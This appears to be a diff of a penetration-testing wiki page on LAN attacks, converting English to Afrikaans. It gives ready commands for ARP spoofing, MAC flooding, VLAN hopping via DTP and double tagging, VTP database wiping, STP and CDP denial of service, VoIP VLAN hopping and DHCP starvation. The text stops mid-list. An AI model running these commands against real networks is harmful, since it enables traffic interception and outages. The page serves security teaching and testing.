\"/tmp/dump-%m-%d-%H-%M-%S-%s.pcap\" -W 50 'tcp and (port 80 or port 443)' &" ``` - -One can, also, capture packets from a remote machine over an SSH session with Wireshark as the GUI in realtime. - +'n Persoon kan ook pakkies van 'n afgeleë masjien oor 'n SSH-sessie vasvang met Wireshark as die GUI in werkliktyd. ``` ssh user@ tcpdump -i ens160 -U -s0 -w - | sudo wireshark -k -i - ssh @ tcpdump -i -U -s0 -w - 'port not 22' | sudo wireshark -k -i - # Exclude SSH traffic ``` - ### Bettercap +Bettercap is 'n kragtige, modulêre en veelsydige hakeringshulpmiddel wat gebruik kan word vir netwerkpenetrering en -analise. 
Dit bied 'n verskeidenheid funksies en tegnieke wat deur hakers gebruik kan word om netwerke te verkennend, inligting te onderskep en aanvalle uit te voer. + +#### Funksies + +- **ARP Spoofing**: Hierdie funksie maak dit moontlik vir 'n aanvaller om die ARP-tabel van 'n doelwitrekenaar te vervals en sodoende alle netwerkverkeer na die aanvaller te stuur. Dit kan gebruik word om inligting te onderskep, sessies te kaap en selfs om man-in-die-middel-aanvalle uit te voer. + +- **HTTP/HTTPS Onderskepping**: Bettercap kan gebruik word om HTTP- en HTTPS-verkeer te onderskep en te manipuleer. Dit maak dit moontlik vir 'n aanvaller om inligting soos wagwoorde, kredietkaartinligting en ander gevoelige data te onderskep. + +- **DNS Spoofing**: Hierdie funksie maak dit moontlik vir 'n aanvaller om DNS-aanvrae te vervals en sodoende die doelwitrekenaar na 'n vals webwerf te stuur. Dit kan gebruik word om gebruikers te mislei en hulle gevoelige inligting te laat invoer op 'n vals webwerf. + +- **WiFi Hacking**: Bettercap kan gebruik word om WiFi-netwerke te hakeer deur middel van tegnieke soos deauth-aanvalle, wachtwoordkraking en man-in-die-middel-aanvalle. Dit kan gebruik word om toegang te verkry tot beveiligde netwerke en om inligting van gebruikers te onderskep. + +- **Plugin-ondersteuning**: Bettercap ondersteun plugins wat funksionaliteit kan toevoeg of aanpas. Dit maak dit moontlik vir hakers om die hulpmiddel aan te pas aan hul spesifieke behoeftes en om nuwe funksies by te voeg. + +#### Installering + +Om Bettercap te installeer, volg die instruksies in die [offisiële dokumentasie](https://www.bettercap.org/installation/). Dit is beskikbaar vir verskeie bedryfstelsels, insluitend Linux, macOS en Windows. + +#### Gebruik + +Na installering kan Bettercap gebruik word deur die opdragreël te hardloop met die nodige argumente en vlaggies. Raadpleeg die [offisiële dokumentasie](https://www.bettercap.org/documentation/) vir 'n volledige lys van opdragreëls en funksies. 
+ +#### Waarskuwing + +Dit is belangrik om te onthou dat die gebruik van Bettercap sonder toestemming van die eienaar van die netwerk of stelsel onwettig is. Dit moet slegs gebruik word vir wettige doeleindes, soos netwerkpenetreringstoetse wat deur toestemming gedek word. ```bash net.sniff on net.sniff stats @@ -260,23 +257,21 @@ set net.sniff.local #If true it will consider packets from/to this computer, ot set net.sniff.filter #BPF filter for the sniffer (default=not arp) set net.sniff.regexp #If set only packets matching this regex will be considered ``` - ### Wireshark -Obviously. +Duidelik. -### Capturing credentials +### Vang van geloofsbriewe -You can use tools like [https://github.com/lgandx/PCredz](https://github.com/lgandx/PCredz) to parse credentials from a pcap or a live interface. +Jy kan gereedskap soos [https://github.com/lgandx/PCredz](https://github.com/lgandx/PCredz) gebruik om geloofsbriewe uit 'n pcap of 'n lewendige koppelvlak te ontled. -## LAN attacks +## LAN-aanvalle -### ARP spoofing +### ARP-spoofing -ARP Spoofing consist on sending gratuitous ARPResponses to indicate that the IP of a machine has the MAC of our device. Then, the victim will change the ARP table and will contact our machine every time it wants to contact the IP spoofed. +ARP-spoofing behels die stuur van valse ARP-antwoorde om aan te dui dat die IP van 'n masjien die MAC van ons toestel het. Dan sal die slagoffer die ARP-tabel verander en elke keer as dit die vervalsde IP wil kontak, sal dit ons masjien kontak. #### **Bettercap** - ```bash arp.spoof on set arp.spoof.targets #Specific targets to ARP spoof (default=) 
@@ -284,37 +279,39 @@ set arp.spoof.whitelist #Specific targets to skip while spoofing set arp.spoof.fullduplex true #If true, both the targets and the gateway will be attacked, otherwise only the target (default=false) set arp.spoof.internal true #If true, local connections among computers of the network will be spoofed, otherwise only connections going to and coming from the Internet (default=false) ``` - #### **Arpspoof** +Arpspoof is 'n hulpmiddel wat gebruik word in netwerkpentesting om ARP (Address Resolution Protocol) vervalsing uit te voer. Hierdie tegniek maak dit moontlik vir 'n aanvaller om die ARP-tabel van 'n doelwitrekenaar te manipuleer, sodat die aanvaller verkeer kan onderskep of omlei. + +Met behulp van arpspoof kan 'n aanvaller die ARP-pakette vervals en valse ARP-antwoorde na die doelwitstelsel stuur. Hierdie valse antwoorde kan die ARP-tabel van die doelwitstelsel manipuleer, sodat die aanvaller se MAC-adres gekoppel word aan die IP-adresse van ander stelsels in die netwerk. + +Hierdie tegniek kan gebruik word om verkeer tussen twee stelsels in 'n netwerk te onderskep of om te lei. Byvoorbeeld, as 'n aanvaller die ARP-tabel van 'n router manipuleer, kan hy al die verkeer wat deur die router gaan, onderskep en ondersoek. + +Arpspoof is 'n kragtige hulpmiddel wat deur netwerkpentesters gebruik kan word om die veiligheid van 'n netwerk te evalueer en swakpunte bloot te lê. Dit is belangrik om hierdie tegniek verantwoordelik te gebruik en slegs met toestemming van die eienaar van die netwerk. ```bash echo 1 > /proc/sys/net/ipv4/ip_forward arpspoof -t 192.168.1.1 192.168.1.2 arpspoof -t 192.168.1.2 192.168.1.1 ``` +### MAC Flooding - CAM-oorloop -### MAC Flooding - CAM overflow - -Overflow the switch’s CAM table sending a lot of packets with different source mac address. When the CAM table is full the switch start behaving like a hub (broadcasting all the traffic). 
- +Oorloop die skakel se CAM-tabel deur 'n groot aantal pakkies met verskillende bron-MAC-adresse te stuur. Wanneer die CAM-tabel vol is, begin die skakel optree soos 'n hub (uitstraling van alle verkeer). ```bash macof -i ``` +In moderne skakelaars is hierdie kwesbaarheid reggestel. -In modern switches this vulnerability has been fixed. +### 802.1Q VLAN / DTP-aanvalle -### 802.1Q VLAN / DTP Attacks +#### Dinamiese Trunking -#### Dynamic Trunking +Die **Dinamiese Trunking-protokol (DTP)** is ontwerp as 'n skakellaag-protokol om 'n outomatiese stelsel vir trunking te fasiliteer, wat skakelaars in staat stel om outomaties poorte vir trunk-modus (Trunk) of nie-trunk-modus te kies. Die implementering van **DTP** word dikwels beskou as 'n aanduiding van suboptimale netwerkontwerp, wat die belang van handmatige konfigurasie van trunks slegs waar nodig en die versekering van behoorlike dokumentasie beklemtoon. -The **Dynamic Trunking Protocol (DTP)** is designed as a link layer protocol to facilitate an automatic system for trunking, allowing switches to automatically select ports for trunk mode (Trunk) or non-trunk mode. The deployment of **DTP** is often seen as indicative of suboptimal network design, underscoring the importance of manually configuring trunks only where necessary and ensuring proper documentation. +Standaard is skakelaarpoorte ingestel om in Dinamiese Outo-modus te werk, wat beteken dat hulle gereed is om trunking te inisieer as dit deur 'n naburige skakelaar aangemoedig word. 'n Sekuriteitskwessie ontstaan wanneer 'n pentester of aanvaller aan die skakelaar koppel en 'n DTP-begeerlike raam stuur, wat die poort dwing om trunk-modus binne te gaan. Hierdie aksie stel die aanvaller in staat om VLAN's deur STP-raamontleding te tel en VLAN-segmentering te omseil deur virtuele interfaces op te stel. -By default, switch ports are set to operate in Dynamic Auto mode, meaning they are ready to initiate trunking if prompted by a neighboring switch. 
A security concern arises when a pentester or attacker connects to the switch and sends a DTP Desirable frame, compelling the port to enter trunk mode. This action enables the attacker to enumerate VLANs through STP frame analysis and circumvent VLAN segmentation by setting up virtual interfaces. - -The presence of DTP in many switches by default can be exploited by adversaries to mimic a switch's behavior, thereby gaining access to traffic across all VLANs. The script [_**dtpscan.sh**_](https://github.com/commonexploits/dtpscan) is utilized to monitor an interface, revealing whether a switch is in Default, Trunk, Dynamic, Auto, or Access mode—the latter being the only configuration immune to VLAN hopping attacks. This tool assesses the switch's vulnerability status. - -Should network vulnerability be identified, the _**Yersinia**_ tool can be employed to "enable trunking" via the DTP protocol, allowing for the observation of packets from all VLANs. +Die teenwoordigheid van DTP in baie skakelaars standaard kan deur teenstanders uitgebuit word om 'n skakelaar se gedrag na te boots, en sodoende toegang te verkry tot verkeer oor alle VLAN's. Die skrip [_**dtpscan.sh**_](https://github.com/commonexploits/dtpscan) word gebruik om 'n inteface te monitor en te onthul of 'n skakelaar in die Verstek, Trunk, Dinamiese, Outo of Toegang-modus is—laasgenoemde is die enigste konfigurasie wat immuun is vir VLAN-hopping-aanvalle. Hierdie instrument beoordeel die kwesbaarheidstatus van die skakelaar. +As netwerkkwesbaarheid geïdentifiseer word, kan die _**Yersinia**_ instrument gebruik word om "trunking" moontlik te maak via die DTP-protokol, wat die waarneming van pakkies van alle VLAN's toelaat. ```bash apt-get install yersinia #Installation sudo apt install kali-linux-large #Another way to install it in Kali 
@@ -325,26 +322,22 @@ yersinia -I #Interactive mode yersinia -G #For graphic mode ``` - ![](<../../.gitbook/assets/image (646) (1).png>) -To enumerate the VLANs it's also possible to generate the DTP Desirable frame with the script [**DTPHijacking.py**](https://github.com/in9uz/VLANPWN/blob/main/DTPHijacking.py)**. D**o not interrupt the script under any circumstances. It injects DTP Desirable every three seconds. **The dynamically created trunk channels on the switch only live for five minutes. After five minutes, the trunk falls off.** - +Om die VLANs op te som, is dit ook moontlik om die DTP Desirable raam met die skripsie [**DTPHijacking.py**](https://github.com/in9uz/VLANPWN/blob/main/DTPHijacking.py)** te genereer. Moenie die skripsie onder enige omstandighede onderbreek nie. Dit spuit DTP Desirable elke drie sekondes in. **Die dinamies geskepte trunk-kanale op die skakelaar bly net vir vyf minute. Na vyf minute val die trunk af.** ``` sudo python3 DTPHijacking.py --interface eth0 ``` +Ek wil graag daarop wys dat **Toegang/Begeerlik (0x03)** aandui dat die DTP-raamwerk van die Begeerlike tipe is, wat die poort vertel om na Trunk-modus oor te skakel. En **802.1Q/802.1Q (0xa5)** dui op die **802.1Q** inkapselingstipe. -I would like to point out that **Access/Desirable (0x03)** indicates that the DTP frame is of the Desirable type, which tells the port to switch to Trunk mode. And **802.1Q/802.1Q (0xa5**) indicates the **802.1Q** encapsulation type. - -By analyzing the STP frames, **we learn about the existence of VLAN 30 and VLAN 60.** +Deur die STP-raamwerke te analiseer, **kom ons agter dat VLAN 30 en VLAN 60 bestaan.**
-#### Attacking specific VLANs - -Once you known VLAN IDs and IPs values, you can **configure a virtual interface to attack a specific VLAN**.\ -If DHCP is not available, then use _ifconfig_ to set a static IP address. +#### Aanval op spesifieke VLANs +Sodra jy die VLAN-ID's en IP-waardes ken, kan jy **'n virtuele koppelvlak konfigureer om 'n spesifieke VLAN aan te val**.\ +As DHCP nie beskikbaar is nie, gebruik dan _ifconfig_ om 'n statiese IP-adres in te stel. ``` root@kali:~# modprobe 8021q root@kali:~# vconfig add eth1 250 @@ -353,13 +346,13 @@ root@kali:~# dhclient eth1.250 Reloading /etc/samba/smb.conf: smbd only. root@kali:~# ifconfig eth1.250 eth1.250 Link encap:Ethernet HWaddr 00:0e:c6:f0:29:65 - inet addr:10.121.5.86 Bcast:10.121.5.255 Mask:255.255.255.0 - inet6 addr: fe80::20e:c6ff:fef0:2965/64 Scope:Link - UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 - RX packets:19 errors:0 dropped:0 overruns:0 frame:0 - TX packets:13 errors:0 dropped:0 overruns:0 carrier:0 - collisions:0 txqueuelen:0 - RX bytes:2206 (2.1 KiB) TX bytes:1654 (1.6 KiB) +inet addr:10.121.5.86 Bcast:10.121.5.255 Mask:255.255.255.0 +inet6 addr: fe80::20e:c6ff:fef0:2965/64 Scope:Link +UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 +RX packets:19 errors:0 dropped:0 overruns:0 frame:0 +TX packets:13 errors:0 dropped:0 overruns:0 carrier:0 +collisions:0 txqueuelen:0 +RX bytes:2206 (2.1 KiB) TX bytes:1654 (1.6 KiB) root@kali:~# arp-scan -I eth1.250 10.121.5.0/24 ``` 
@@ -377,182 +370,209 @@ sudo vconfig add eth0 30 sudo ip link set eth0.30 up sudo dhclient -v eth0.30 ``` +#### Outomatiese VLAN Hopper -#### Automatic VLAN Hopper +Die bespreekte aanval van **Dinamiese Trunking en die skep van virtuele interfaces en die ontdekking van gasheer in ander VLAN's** word **outomaties uitgevoer** deur die instrument: [**https://github.com/nccgroup/vlan-hopping---frogger**](https://github.com/nccgroup/vlan-hopping---frogger) -The discussed attack of **Dynamic Trunking and creating virtual interfaces an discovering hosts inside** other VLANs are **automatically performed** by the tool: [**https://github.com/nccgroup/vlan-hopping---frogger**](https://github.com/nccgroup/vlan-hopping---frogger) +#### Dubbele Tagging -#### Double Tagging +As 'n aanvaller die waarde van die **MAC, IP en VLAN ID van die slagoffer gasheer** ken, kan hy probeer om 'n raamwerk **dubbel te merk met sy aangewese VLAN en die VLAN van die slagoffer** en 'n pakkie stuur. Aangesien die **slagoffer nie kan terugkoppel** met die aanvaller nie, is die **beste opsie vir die aanvaller om te kommunikeer via UDP** na protokolle wat interessante aksies kan uitvoer (soos SNMP). -If an attacker knows the value of the **MAC, IP and VLAN ID of the victim host**, he could try to **double tag a frame** with its designated VLAN and the VLAN of the victim and send a packet. As the **victim won't be able to connect back** with the attacker, so the **best option for the attacker is communicate via UDP** to protocols that can perform some interesting actions (like SNMP). - -Another option for the attacker is to launch a **TCP port scan spoofing an IP controlled by the attacker and accessible by the victim** (probably through internet). Then, the attacker could sniff in the second host owned by him if it receives some packets from the victim. 
+'n Ander opsie vir die aanvaller is om 'n **TCP-poortskandering te begin deur 'n IP te vervals wat deur die aanvaller beheer word en toeganklik is deur die slagoffer** (waarskynlik deur die internet). Dan kan die aanvaller snuffel in die tweede gasheer wat aan hom behoort as dit pakkies van die slagoffer ontvang. ![](<../../.gitbook/assets/image (635) (1).png>) -To perform this attack you could use scapy: `pip install scapy` - +Om hierdie aanval uit te voer, kan jy scapy gebruik: `pip install scapy` ```python from scapy.all import * # Double tagging with ICMP packet (the response from the victim isn't double tagged so it will never reach the attacker) packet = Ether()/Dot1Q(vlan=1)/Dot1Q(vlan=20)/IP(dst='192.168.1.10')/ICMP() sendp(packet) ``` +#### Laterale VLAN-segmenteringsoorskryding -#### Lateral VLAN Segmentation Bypass - -If you have **access to a switch that you are directly connected to**, you have the ability to **bypass VLAN segmentation** within the network. Simply **switch the port to trunk mode** (otherwise known as trunk), create virtual interfaces with the IDs of the target VLANs, and configure an IP address. You can try requesting the address dynamically (DHCP) or you can configure it statically. It depends on the case. +As jy **toegang het tot 'n skakelaar waaraan jy direk gekoppel is**, het jy die vermoë om **VLAN-segmentering te omseil** binne die netwerk. Skakel eenvoudig die poort na trunk-modus (ook bekend as trunk), skep virtuele interfaces met die ID's van die teiken-VLAN's, en konfigureer 'n IP-adres. Jy kan probeer om die adres dinamies aan te vra (DHCP) of jy kan dit staties konfigureer. Dit hang af van die geval. 
{% content-ref url="lateral-vlan-segmentation-bypass.md" %} [lateral-vlan-segmentation-bypass.md](lateral-vlan-segmentation-bypass.md) {% endcontent-ref %} -#### Layer 3 Private VLAN Bypass +#### Laag 3 Privaat VLAN-oorskryding -In certain environments, such as guest wireless networks, **port isolation (also known as private VLAN)** settings are implemented to prevent clients connected to a wireless access point from directly communicating with each other. However, a technique has been identified that can circumvent these isolation measures. This technique exploits either the lack of network ACLs or their improper configuration, enabling IP packets to be routed through a router to reach another client on the same network. +In sekere omgewings, soos gasdraadlose netwerke, word **poort-isolasie (ook bekend as privaat VLAN)**-instellings geïmplementeer om te voorkom dat kliënte wat aan 'n draadlose toegangspunt gekoppel is, direk met mekaar kommunikeer. 'n Tegniek is egter geïdentifiseer wat hierdie isolasie-maatreëls kan omseil. Hierdie tegniek maak gebruik van die gebrek aan netwerk ACL's of hul onvanpaste konfigurasie, wat IP-pakette in staat stel om deur 'n router gerouteer te word om 'n ander kliënt op dieselfde netwerk te bereik. -The attack is executed by creating a **packet that carries the IP address of the destination client but with the router's MAC address**. This causes the router to mistakenly forward the packet to the target client. This approach is similar to that used in Double Tagging Attacks, where the ability to control a host accessible to the victim is used to exploit the security flaw. +Die aanval word uitgevoer deur 'n **pakkie te skep wat die IP-adres van die teikenkliënt dra, maar met die MAC-adres van die router**. Dit veroorsaak dat die router die pakkie per abuis na die teikenkliënt stuur. 
Hierdie benadering is soortgelyk aan dié wat gebruik word in Dubbele Merkingaanvalle, waar die vermoë om 'n gasheer wat toeganklik is vir die slagoffer te beheer, gebruik word om die sekuriteitsfout uit te buit. -**Key Steps of the Attack:** -1. **Crafting a Packet:** A packet is specially crafted to include the target client's IP address but with the router's MAC address. -2. **Exploiting Router Behavior:** The crafted packet is sent up to the router, which, due to the configuration, redirects the packet to the target client, bypassing the isolation provided by private VLAN settings. +**Belangrike stappe van die aanval:** +1. **Skep van 'n pakkie:** 'n Pakkie word spesiaal geskep om die IP-adres van die teikenkliënt in te sluit, maar met die MAC-adres van die router. +2. **Uitbuiting van routergedrag:** Die geskepte pakkie word na die router gestuur, wat as gevolg van die konfigurasie die pakkie na die teikenkliënt omskakel en sodoende die isolasie wat deur privaat VLAN-instellings voorsien word, omseil. -### VTP Attacks +### VTP-aanvalle -VTP (VLAN Trunking Protocol) centralizes VLAN management. It utilizes revision numbers to maintain VLAN database integrity; any modification increments this number. Switches adopt configurations with higher revision numbers, updating their own VLAN databases. +VTP (VLAN Trunking Protocol) sentraliseer VLAN-bestuur. Dit maak gebruik van revisienommers om die integriteit van die VLAN-databasis te handhaaf; enige wysiging verhoog hierdie nommer. Skakelaars neem konfigurasies met hoër revisienommers oor en werk hul eie VLAN-databasisse by. -#### VTP Domain Roles +#### VTP-domeinrolle -- **VTP Server:** Manages VLANs—creates, deletes, modifies. It broadcasts VTP announcements to domain members. -- **VTP Client:** Receives VTP announcements to synchronize its VLAN database. This role is restricted from local VLAN configuration modifications. -- **VTP Transparent:** Doesn't engage in VTP updates but forwards VTP announcements. 
Unaffected by VTP attacks, it maintains a constant revision number of zero. +- **VTP-bediener:** Bestuur VLAN's - skep, verwyder, wysig. Dit versprei VTP-aankondigings na domeinlede. +- **VTP-kliënt:** Ontvang VTP-aankondigings om sy VLAN-databasis te sinchroniseer. Hierdie rol is beperk vanaf plaaslike VLAN-konfigurasiewysigings. +- **VTP-deursigtig:** Neem nie deel aan VTP-opdaterings nie, maar stuur VTP-aankondigings deur. Dit word nie deur VTP-aanvalle geraak nie en handhaaf 'n konstante revisienommer van nul. -#### VTP Advertisement Types +#### VTP-advertensietipes -- **Summary Advertisement:** Broadcasted by the VTP server every 300 seconds, carrying essential domain information. -- **Subset Advertisement:** Sent following VLAN configuration changes. -- **Advertisement Request:** Issued by a VTP client to request a Summary Advertisement, typically in response to detecting a higher configuration revision number. +- **Opsommingsadvertensie:** Versprei deur die VTP-bediener elke 300 sekondes en dra noodsaaklike domeininligting. +- **Substeladvertensie:** Gestuur na VLAN-konfigurasieveranderinge. +- **Advertensieversoek:** Uitgereik deur 'n VTP-kliënt om 'n opsommingsadvertensie aan te vra, tipies as reaksie op die opsporing van 'n hoër konfigurasie-revisienommer. -VTP vulnerabilities are exploitable exclusively via trunk ports as VTP announcements circulate solely through them. Post-DTP attack scenarios might pivot towards VTP. Tools like Yersinia can facilitate VTP attacks, aiming to wipe out the VLAN database, effectively disrupting the network. - -Note: This discussion pertains to VTP version 1 (VTPv1). +VTP-gebreklikhede is uitsluitlik uitbuitbaar via trunkpoorte, aangesien VTP-aankondigings slegs daardeur versprei word. Post-DTP-aanvalscenario's kan na VTP oorskakel. Hulpmiddels soos Yersinia kan VTP-aanvalle fasiliteer deur die VLAN-databasis uit te wis en sodoende die netwerk te ontwrig. +Opmerking: Hierdie bespreking handel oor VTP-weergawe 1 (VTPv1). 
```bash %% yersinia -G # Launch Yersinia in graphical mode ``` ``` - -In Yersinia's graphical mode, choose the deleting all VTP vlans option to purge the VLAN database. +In Yersinia se grafiese modus, kies die opsie om al die VTP vlans te verwyder om die VLAN-databasis te skoonmaak. -### STP Attacks +### STP Aanvalle -**If you cannot capture BPDU frames on your interfaces, it is unlikely that you will succeed in an STP attack.** +**As jy nie BPDU-rame op jou interfaces kan vasvang nie, is dit onwaarskynlik dat jy suksesvol sal wees met 'n STP-aanval.** #### **STP BPDU DoS** -Sending a lot of BPDUs TCP (Topology Change Notification) or Conf (the BPDUs that are sent when the topology is created) the switches are overloaded and stop working correctly. - +Deur 'n groot hoeveelheid BPDUs TCP (Topology Change Notification) of Conf (die BPDUs wat gestuur word wanneer die topologie geskep word) te stuur, word die skakelaars oorlê en hou op om korrek te werk. ```bash yersinia stp -attack 2 yersinia stp -attack 3 #Use -M to disable MAC spoofing ``` +#### **STP TCP Aanval** -#### **STP TCP Attack** - -When a TCP is sent, the CAM table of the switches will be deleted in 15s. Then, if you are sending continuously this kind of packets, the CAM table will be restarted continuously (or every 15segs) and when it is restarted, the switch behaves as a hub - +Wanneer 'n TCP-pakket gestuur word, sal die CAM-tabel van die skakelaars binne 15 sekondes uitgevee word. Dan, as jy voortdurend hierdie soort pakkette stuur, sal die CAM-tabel voortdurend herlaai word (elke 15 sekondes) en wanneer dit herlaai word, gedra die skakelaar hom soos 'n hub. ```bash yersinia stp -attack 1 #Will send 1 TCP packet and the switch should restore the CAM in 15 seconds yersinia stp -attack 0 #Will send 1 CONF packet, nothing else will happen ``` +#### **STP-wortelaanval** -#### **STP Root Attack** - -The attacker simulates the behaviour of a switch to become the STP root of the network. 
Then, more data will pass through him. This is interesting when you are connected to two different switches.\ -This is done by sending BPDUs CONF packets saying that the **priority** value is less than the actual priority of the actual root switch. - +Die aanvaller boots die gedrag van 'n skakelaar na om die STP-wortel van die netwerk te word. Dan sal meer data deur hom gaan. Dit is interessant wanneer jy aan twee verskillende skakelaars gekoppel is.\ +Dit word gedoen deur BPDUs CONF-pakette te stuur wat sê dat die **prioriteit**-waarde minder is as die werklike prioriteit van die werklike wortelskakelaar. ```bash yersinia stp -attack 4 #Behaves like the root switch yersinia stp -attack 5 #This will make the device behaves as a switch but will not be root ``` - -**If the attacker is connected to 2 switches he can be the root of the new tree and all the traffic between those switches will pass through him** (a MITM attack will be performed). - +**As die aanvaller aan 2 skakelaars gekoppel is, kan hy die wortel van die nuwe boom wees en al die verkeer tussen daardie skakelaars sal deur hom gaan** (‘n MITM-aanval sal uitgevoer word). ```bash yersinia stp -attack 6 #This will cause a DoS as the layer 2 packets wont be forwarded. You can use Ettercap to forward those packets "Sniff" --> "Bridged sniffing" ettercap -T -i eth1 -B eth2 -q #Set a bridge between 2 interfaces to forwardpackages ``` +### CDP Aanvalle -### CDP Attacks +CISCO Discovery Protocol (CDP) is noodsaaklik vir kommunikasie tussen CISCO-toestelle, wat hulle in staat stel om **elkaar te identifiseer en konfigurasiebesonderhede te deel**. -CISCO Discovery Protocol (CDP) is essential for communication between CISCO devices, allowing them to **identify each other and share configuration details**. +#### Passiewe Data Versameling -#### Passive Data Collection +CDP is gekonfigureer om inligting deur alle poorte uit te saai, wat 'n sekuriteitsrisiko kan veroorsaak. 
'n Aanvaller kan, nadat hy aan 'n skakelaarpoort gekoppel het, netwerksnuffelaars soos **Wireshark**, **tcpdump**, of **Yersinia** gebruik. Hierdie aksie kan sensitiewe data oor die netwerktoestel onthul, insluitend die model en die weergawe van Cisco IOS wat dit gebruik. Die aanvaller kan dan spesifieke kwesbaarhede in die geïdentifiseerde Cisco IOS-weergawe teiken. -CDP is configured to broadcast information through all ports, which might lead to a security risk. An attacker, upon connecting to a switch port, could deploy network sniffers like **Wireshark**, **tcpdump**, or **Yersinia**. This action can reveal sensitive data about the network device, including its model and the version of Cisco IOS it runs. The attacker might then target specific vulnerabilities in the identified Cisco IOS version. - -#### Inducing CDP Table Flooding - -A more aggressive approach involves launching a Denial of Service (DoS) attack by overwhelming the switch's memory, pretending to be legitimate CISCO devices. Below is the command sequence for initiating such an attack using Yersinia, a network tool designed for testing: +#### Induseer CDP Tabel Oorstroming +'n Meer aggressiewe benadering behels die lanceer van 'n Denial of Service (DoS) aanval deur die skakelaar se geheue te oorweldig, terwyl dit voorgee om legitieme CISCO-toestelle te wees. Hieronder is die opdragvolgorde vir die inisieer van so 'n aanval met behulp van Yersinia, 'n netwerkwerktuig wat ontwerp is vir toetsdoeleindes: ```bash sudo yersinia cdp -attack 1 # Initiates a DoS attack by simulating fake CISCO devices # Alternatively, for a GUI approach: sudo yersinia -G ``` +Tydens hierdie aanval word die CPU van die skakelaar en die CDP-buurtabel swaar belas, wat dikwels verwys word na as **"netwerk verlamming"** as gevolg van die oormatige gebruik van hulpbronne. 
-During this attack, the switch's CPU and CDP neighbor table are heavily burdened, leading to what is often referred to as **“network paralysis”** due to the excessive resource consumption. - -#### CDP Impersonation Attack - +#### CDP Impersonation Aanval ```bash sudo yersinia cdp -attack 2 #Simulate a new CISCO device sudo yersinia cdp -attack 0 #Send a CDP packet ``` +Jy kan ook [**scapy**](https://github.com/secdev/scapy/) gebruik. Maak seker dat jy dit installeer met die `scapy/contrib` pakkie. -You could also use [**scapy**](https://github.com/secdev/scapy/). Be sure to install it with `scapy/contrib` package. +### VoIP Aanvalle en die VoIP Hopper Gereedskap -### VoIP Attacks and the VoIP Hopper Tool +VoIP-telefone, wat toenemend geïntegreer word met IoT-toestelle, bied funksionaliteite soos die ontgrendeling van deure of die beheer van termostate deur middel van spesiale telefoonnommers. Hierdie integrasie kan egter sekuriteitsrisiko's inhou. -VoIP phones, increasingly integrated with IoT devices, offer functionalities like unlocking doors or controlling thermostats through special phone numbers. However, this integration can pose security risks. +Die gereedskap [**voiphopper**](http://voiphopper.sourceforge.net) is ontwerp om 'n VoIP-telefoon in verskillende omgewings na te boots (Cisco, Avaya, Nortel, Alcatel-Lucent). Dit ontdek die VLAN-ID van die spraaknetwerk deur gebruik te maak van protokolle soos CDP, DHCP, LLDP-MED en 802.1Q ARP. -The tool [**voiphopper**](http://voiphopper.sourceforge.net) is designed to emulate a VoIP phone in various environments (Cisco, Avaya, Nortel, Alcatel-Lucent). It discovers the voice network's VLAN ID using protocols like CDP, DHCP, LLDP-MED, and 802.1Q ARP. +**VoIP Hopper** bied drie modusse vir die Cisco Discovery Protocol (CDP): -**VoIP Hopper** offers three modes for the Cisco Discovery Protocol (CDP): +1. **Sniff Modus** (`-c 0`): Analiseer netwerkpakette om die VLAN-ID te identifiseer. +2. 
**Spoof Modus** (`-c 1`): Genereer aangepaste pakkette wat dieselfde is as dié van 'n werklike VoIP-toestel. +3. **Spoof met Voorgemaakte Pakket Modus** (`-c 2`): Stuur pakkette wat identies is aan dié van 'n spesifieke Cisco IP-telefoonmodel. -1. **Sniff Mode** (`-c 0`): Analyzes network packets to identify the VLAN ID. -2. **Spoof Mode** (`-c 1`): Generates custom packets mimicking those of an actual VoIP device. -3. **Spoof with Pre-made Packet Mode** (`-c 2`): Sends packets identical to those of a specific Cisco IP phone model. +Die voorkeurmodus vir spoed is die derde een. Dit vereis die spesifisering van: -The preferred mode for speed is the third one. It requires specifying: +- Die aanvaller se netwerkinterface (`-i` parameter). +- Die naam van die nagebootste VoIP-toestel (`-E` parameter), wat voldoen aan die Cisco-naamformaat (bv. SEP gevolg deur 'n MAC-adres). -- The attacker's network interface (`-i` parameter). -- The name of the VoIP device being emulated (`-E` parameter), adhering to the Cisco naming format (e.g., SEP followed by a MAC address). +In korporatiewe omgewings kan 'n bestaande VoIP-toestel nageboots word deur: -In corporate settings, to mimic an existing VoIP device, one might: - -- Inspect the MAC label on the phone. -- Navigate the phone's display settings to view model information. -- Connect the VoIP device to a laptop and observe CDP requests using Wireshark. - -An example command to execute the tool in the third mode would be: +- Die MAC-etiket op die telefoon te ondersoek. +- Deur die telefoon se vertooningsinstellings te navigeer om modelinligting te sien. +- Die VoIP-toestel aan 'n rekenaar te koppel en CDP-versoeke te ondersoek met behulp van Wireshark. 
+'n Voorbeeldopdrag om die gereedskap in die derde modus uit te voer, sou wees: ```bash voiphopper -i eth1 -E 'SEP001EEEEEEEEE ' -c 2 ``` +#### Opname -### DHCP Attacks +DHCP (Dynamic Host Configuration Protocol) is 'n protokol wat gebruik word om IP-adresse en ander netwerkinstellings aan 'n toestel in 'n netwerk toe te ken. Dit is 'n belangrike stap in die opstel van 'n netwerkverbinding. Tydens 'n pentest kan jy DHCP-aanvalle gebruik om inligting oor die netwerk te versamel. -#### Enumeration +Daar is verskeie metodes om DHCP-inligting te ondersoek en op te neem: +1. **DHCP Discovery**: Hierdie metode behels die gebruik van 'n DHCP Discovery-hulpmiddel om 'n DHCP-aanvraag na die netwerk te stuur en die reaksie te ontleed. Dit kan help om die DHCP-bedieners in die netwerk te identifiseer. +2. **DHCP Starvation**: Hierdie aanval behels die oorweldiging van die DHCP-bedieners met valse DHCP-aanvrae. Dit kan lei tot 'n uitputting van die beskikbare IP-adresse en 'n versteuring van die netwerk. +3. **DHCP Spoofing**: Hierdie aanval behels die stuur van valse DHCP-antwoorde na die kliënttoestelle in die netwerk. Dit kan lei tot die oorname van die IP-adres van 'n ander toestel en die onderskepping van netwerkverkeer. + +#### DHCP Discovery + +Die DHCP Discovery-metode kan uitgevoer word deur die volgende stappe te volg: + +1. Installeer 'n DHCP Discovery-hulpmiddel soos `dhcpdump` of `dhcpig`. +2. Stuur 'n DHCP Discovery-aanvraag na die netwerk met behulp van die hulpmiddel. +3. Ontleed die reaksie om die DHCP-bedieners in die netwerk te identifiseer. +4. Analiseer die inligting om potensiële doelwitte vir verdere aanvalle te identifiseer. + +#### DHCP Starvation + +Die DHCP Starvation-aanval kan uitgevoer word deur die volgende stappe te volg: + +1. Installeer 'n DHCP Starvation-hulpmiddel soos `yersinia` of `dhcpstarv`. +2. Stuur valse DHCP-aanvrae na die DHCP-bedieners in die netwerk. +3. Monitor die netwerk 